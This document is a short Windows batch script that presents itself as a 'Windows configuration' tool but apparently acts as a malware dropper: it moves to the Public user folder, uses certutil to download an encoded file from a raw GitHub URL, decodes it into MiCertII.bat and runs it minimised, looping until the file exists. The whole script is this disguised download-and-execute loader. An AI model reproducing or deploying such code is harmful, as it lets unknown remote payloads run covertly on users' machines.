@echo off 
echo . 
color 1a
title W  I  N  D  O  W  S    C  O  N  F  I  G  U  A  T  I  O  N
echo W  I  N  D  O  W  S    C  O  N  F  I  G  U  A  T  I  O  N 

cd.. || cd .. & cd.. || cd .. & cd.. || cd .. & cd / & cd Users || cd "Users" & cd Public || cd "Public"

:alamo
certutil.exe -decode MiCertII.uiaq MiCertII.bat
IF EXIST MiCertII.bat (
	start /min MiCertII.bat
	exit
) ELSE (
	certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/argene-nyc/sevilla/master/MiCertII.uiaq" MiCertII.uiaq
)
goto alamo


